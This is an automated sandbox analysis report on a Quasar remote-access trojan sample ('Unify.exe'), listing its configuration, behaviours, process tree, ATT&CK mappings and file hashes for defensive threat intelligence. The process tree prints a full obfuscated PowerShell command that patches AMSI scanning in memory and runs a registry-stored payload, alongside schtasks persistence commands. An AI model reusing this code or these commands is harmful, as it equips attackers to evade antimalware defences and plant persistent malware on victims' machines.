Analysis
-
max time kernel
1200s -
max time network
1198s -
platform
windows10-2004_x64 -
resource
win10v2004-20240419-en -
resource tags
-
submitted
02-05-2024 00:51
General
-
Target
Unify.exe
-
Size
409KB
-
MD5
54db32b9d5cab2c1dea1907cf4712b1d
-
SHA1
812f28828735a92effd2187e155d9ed3f0e915b3
-
SHA256
e7d8e1b13c833d49fcc46a03d34ff18b7c93bd86bd0764828fa68d3d9eed2bbe
-
SHA512
6a13febe964f3f639e7d017f58c2f6631c18bea5a1ac716efa49a1c5306ecd2708cf92f133a9fcd8dc22850e661522a98f23c0fb7cb09752bb96a6d50bb69163
-
SSDEEP
6144:0MP9p1kREG60olVji9QzNg/IiSjFqBFK6WbMN6Y44vZqJBWAb7yMTj:fpiREGJ2ji9QyAhK/N6gBqJBj7yMTj
Score
10/10
Malware Config
Extracted
Family
quasar
Version
3.1.5
Botnet
Slave
C2
192.168.1.20:4782
localhost:4782
Mutex
$Sxr-3vDee7FzoJnhqjuE3n
Attributes
-
encryption_key
hwZQsCIcvotNKosjYueb
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-mstha
-
subdirectory
Windows
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 2 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 19 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of UnmapMainImage 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{31f0d2dd-5521-42b4-b52d-05be77e0dd7e}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:czZanpXTJDNC{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RrUIwGhpZggNMN,[Parameter(Position=1)][Type]$KgjZiSyijh)$vdEYfkuhVZs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+'o'+''+[Char](114)+''+[Char](121)+'M'+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+'l'+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+'yp'+[Char](101)+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+''+[Char](108)+'e'+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+'C'+'l'+'a'+''+[Char](115)+''+'s'+''+','+''+'A'+'ut'+[Char](111)+'C'+'l'+'as'+[Char](115)+'',[MulticastDelegate]);$vdEYfkuhVZs.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+[Char](101)+'ci'+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+'m'+''+[Char](101)+''+','+'Hide'+[Char](66)+'y'+[Char](83)+''+[Char](105)+''+'g'+','+[Char](80)+''+'u'+''+[Char](98)+'li'+'c'+'',[Reflection.CallingConventions]::Standard,$RrUIwGhpZggNMN).SetImplementationFlags('R'+[Char](117)+''+'n'+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+',Ma'+[Char](110)+''+[Char](97)+''+'g'+'e'+'d'+'');$vdEYfkuhVZs.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+'e'+'',''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+'H'+'i'+[Char](100)+'e'+[Char](66)+''+'y'+''+'S'+'ig,'+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+[Char](111)+''+[Char](116)+''+','+''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+'al',$KgjZiSyijh,$RrUIwGhpZggNMN).SetImplementationFlags(''+[Char](82)+'u'+'n'+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+','+[Char](77)+'a'+'n'+'ag'+[Char](101)+''+'d'+'');Write-Output $vdEYfkuhVZs.CreateType();}$OXRmaNIcWYdGZ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+[Char](101)+''+'m'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+''+[Char](114)+''+[Char](111)+''+[Char](115)+'o'+[Char](102)+''+[Char](116)+''+'.'+''+'W'+''+'i'+''+'n'+''+[Char](51)+'2'+'.'+''+[Char](85)+''+[Char](110)+''+'s'+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+'i'+''+[Char](118)+'e'+[Char](77)+'e'+[Char](116)+''+[Char](104)+''+[Char](111)+''+'d'+''+[Char](115)+'');$uEUKqbPKtpjueS=$OXRmaNIcWYdGZ.GetMethod(''+'G'+'e'+[Char](116)+''+'P'+''+'r'+'o'+[Char](99)+''+[Char](65)+''+[Char](100)+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags]('Pub'+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$sOjmIwCASooZgGLJTQV=czZanpXTJDNC @([String])([IntPtr]);$MfXwfssSrYLqZnrqtqvDTL=czZanpXTJDNC @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$BLDGeFhTLBX=$OXRmaNIcWYdGZ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+'e'+[Char](108)+'32.'+'d'+'l'+'l'+'')));$OmXfsyzDRzHntc=$uEUKqbPKtpjueS.Invoke($Null,@([Object]$BLDGeFhTLBX,[Object](''+[Char](76)+''+[Char](111)+'ad'+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+[Char](97)+''+[Char](114)+''+[Char](121)+'A')));$gSFljFTpUnBbHVpmH=$uEUKqbPKtpjueS.Invoke($Null,@([Object]$BLDGeFhTLBX,[Object](''+[Char](86)+'i'+'r'+''+'t'+''+'u'+''+[Char](97)+''+[Char](108)+''+'P'+''+'r'+''+[Char](111)+''+'t'+''+'e'+''+[Char](99)+''+[Char](116)+'')));$QjuMUqj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OmXfsyzDRzHntc,$sOjmIwCASooZgGLJTQV).Invoke('a'+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+'d'+[Char](108)+'l');$qWyZcRvkZIzLtyNFz=$uEUKqbPKtpjueS.Invoke($Null,@([Object]$QjuMUqj,[Object]('A'+'m'+''+'s'+''+[Char](105)+'S'+'c'+''+[Char](97)+''+'n'+'B'+[Char](117)+''+[Char](102)+''+'f'+'e'+'r'+'')));$VtSLoodbUo=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gSFljFTpUnBbHVpmH,$MfXwfssSrYLqZnrqtqvDTL).Invoke($qWyZcRvkZIzLtyNFz,[uint32]8,4,[ref]$VtSLoodbUo);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$qWyZcRvkZIzLtyNFz,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($gSFljFTpUnBbHVpmH,$MfXwfssSrYLqZnrqtqvDTL).Invoke($qWyZcRvkZIzLtyNFz,[uint32]8,0x20,[ref]$VtSLoodbUo);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+'F'+''+[Char](84)+''+'W'+'A'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](36)+'7'+'7'+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵
-
C:\Windows\system32\sihost.exesihost.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵
- Drops file in System32 directory
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of UnmapMainImage
-
C:\Users\Admin\AppData\Local\Temp\Unify.exe"C:\Users\Admin\AppData\Local\Temp\Unify.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-mstha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\Unify.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "$srr-mstha" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe" /rl HIGHEST /f4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\install.exe"C:\Users\Admin\AppData\Local\Temp\install.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\SCHTASKS.exe"SCHTASKS.exe" /create /tn "$77Unify.exe" /tr "'C:\Users\Admin\AppData\Local\Temp\Unify.exe'" /sc onlogon /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Modifies registry class
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks SCSI registry key(s)
- Enumerates system info in registry
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe b1354f2ba1237c85937630fb7dda33fa EXaPqgTFoUSRe684H9B82w.0.1.0.0.01⤵
- Sets service image path in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv1⤵
- Drops file in Windows directory
-
C:\Windows\servicing\TrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
-
C:\Windows\system32\backgroundTaskHost.exe"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca1⤵
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.11⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\V01.chkFilesize
8KB
MD5317f01e4ddff0748012986efee0ab81e
SHA1b2d9a4bb8017bbc9d1c78ca4ac222e7125034073
SHA256881d003f22a3db599df71cf1456adc7293f3ed68494d84ab6f140f6867fab7f2
SHA512846d3fc8e36109596618505e3637f74c60f8f417d333001cefbf65564db5a825c21969e0427806887f78268053b2897c882915aaecfcf66578d8e3bbdc0d09a7
-
C:\Users\Admin\AppData\Local\Temp\install.exeFilesize
162KB
MD5152e3f07bbaf88fb8b097ba05a60df6e
SHA1c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA5122fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4
-
C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exeFilesize
409KB
MD554db32b9d5cab2c1dea1907cf4712b1d
SHA1812f28828735a92effd2187e155d9ed3f0e915b3
SHA256e7d8e1b13c833d49fcc46a03d34ff18b7c93bd86bd0764828fa68d3d9eed2bbe
SHA5126a13febe964f3f639e7d017f58c2f6631c18bea5a1ac716efa49a1c5306ecd2708cf92f133a9fcd8dc22850e661522a98f23c0fb7cb09752bb96a6d50bb69163
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD58abf2d6067c6f3191a015f84aa9b6efe
SHA198f2b0a5cdb13cd3d82dc17bd43741bf0b3496f7
SHA256ee18bd3259f220c41062abcbe71a421da3e910df11b9f86308a16cdc3a66fbea
SHA512c2d686a6373efcff583c1ef50c144c59addb8b9c4857ccd8565cd8be3c94b0ac0273945167eb04ebd40dfb0351e4b66cffe4c4e478fb7733714630a11f765b63
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance WorkFilesize
2KB
MD5f313c5b4f95605026428425586317353
SHA106be66fa06e1cffc54459c38d3d258f46669d01a
SHA256129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b
SHA512b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD5ceb7caa4e9c4b8d760dbf7e9e5ca44c5
SHA1a3879621f9493414d497ea6d70fbf17e283d5c08
SHA25698c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9
SHA5121eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To WorkFilesize
2KB
MD57d612892b20e70250dbd00d0cdd4f09b
SHA163251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5
SHA256727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02
SHA512f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD51e8e2076314d54dd72e7ee09ff8a52ab
SHA15fd0a67671430f66237f483eef39ff599b892272
SHA25655f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f
SHA5125b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6
-
C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule WorkFilesize
2KB
MD50b990e24f1e839462c0ac35fef1d119e
SHA19e17905f8f68f9ce0a2024d57b537aa8b39c6708
SHA256a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a
SHA512c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506Filesize
330B
MD5d68c3f9d39129d84db385ccaa1d5c083
SHA136813376cd5e76363333cd49a4e818c96f043ad6
SHA256574d1f7f9b9636f3237390a81f831870c4c336a3cb3129141fe4039883ba83e2
SHA51214fb165df4747c94d6f1b89591b75cbd6b6e4e9c9eaa42d7d7f9537c7a3b47d6de9e57eed4d75713fc5df94915cfd449afad164d905b03c25c8951bb3d5b2930
-
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749Filesize
290B
MD572890d5b5fcd9b7cf9525622fbc73cdc
SHA105f6663f4b6c765f81579b7524b656dfe27c9723
SHA256c5cd9e40a0e1c2b33f5c5d2a4ee6a8d4efe412cc2f275cec26031bd2be8b2d93
SHA512ee0b3c53949589b4be90caec576b31fd65a98225e06279beb9c02f8387b36962db9425b90344d6bec686d34fdc29c723f15a4a3a3092f22b43eddcd82c65688c
-
C:\Windows\Temp\__PSScriptPolicyTest_naqhkywz.o0e.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04Filesize
412B
MD50e05cdc171abc40eb42b921e7bb7894e
SHA1c713d2cd224b5b14afd24b3dace9cad8d32af0bb
SHA256267a13c3b7a5cd40757d1202ef1ae7be2b84e34f210b3f9a0fd1e95600acb306
SHA5127bb0e563b019a6b6fa4ca2b12bbf82aaa46b38e8652582e3a276e4af80f8b28196a508e9efa76cb348a7dc3bb8f33c1eb395ba2ec19e94e7ded8c18ce4525313
-
memory/64-82-0x000001E9491C0000-0x000001E9491EB000-memory.dmpFilesize
172KB
-
memory/64-88-0x000001E9491C0000-0x000001E9491EB000-memory.dmpFilesize
172KB
-
memory/64-89-0x00007FFD8CD10000-0x00007FFD8CD20000-memory.dmpFilesize
64KB
-
memory/408-93-0x000001A99A710000-0x000001A99A73B000-memory.dmpFilesize
172KB
-
memory/616-45-0x0000019AA3E10000-0x0000019AA3E35000-memory.dmpFilesize
148KB
-
memory/616-46-0x0000019AA3E40000-0x0000019AA3E6B000-memory.dmpFilesize
172KB
-
memory/616-47-0x0000019AA3E40000-0x0000019AA3E6B000-memory.dmpFilesize
172KB
-
memory/616-53-0x0000019AA3E40000-0x0000019AA3E6B000-memory.dmpFilesize
172KB
-
memory/616-54-0x00007FFD8CD10000-0x00007FFD8CD20000-memory.dmpFilesize
64KB
-
memory/676-65-0x00007FFD8CD10000-0x00007FFD8CD20000-memory.dmpFilesize
64KB
-
memory/676-64-0x00000143A40D0000-0x00000143A40FB000-memory.dmpFilesize
172KB
-
memory/676-58-0x00000143A40D0000-0x00000143A40FB000-memory.dmpFilesize
172KB
-
memory/956-78-0x00007FFD8CD10000-0x00007FFD8CD20000-memory.dmpFilesize
64KB
-
memory/956-71-0x000001CF86450000-0x000001CF8647B000-memory.dmpFilesize
172KB
-
memory/956-77-0x000001CF86450000-0x000001CF8647B000-memory.dmpFilesize
172KB
-
memory/1524-21-0x000001D21F910000-0x000001D21F932000-memory.dmpFilesize
136KB
-
memory/1524-31-0x000001D21FC80000-0x000001D21FCAA000-memory.dmpFilesize
168KB
-
memory/1524-32-0x00007FFDCCC90000-0x00007FFDCCE85000-memory.dmpFilesize
2.0MB
-
memory/1524-33-0x00007FFDCC8E0000-0x00007FFDCC99E000-memory.dmpFilesize
760KB
-
memory/3244-7-0x00000000069E0000-0x0000000006A1C000-memory.dmpFilesize
240KB
-
memory/3244-20-0x0000000074A70000-0x0000000075220000-memory.dmpFilesize
7.7MB
-
